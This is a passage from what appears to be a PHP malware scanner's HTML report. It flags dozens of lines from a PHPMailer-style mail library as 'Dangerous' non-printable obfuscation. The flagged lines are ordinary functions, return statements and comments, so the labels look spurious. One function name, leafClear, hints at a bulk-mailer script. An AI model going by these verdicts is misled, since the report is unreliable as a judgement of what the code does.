<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2800</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2840</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2858</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2981</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3097</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
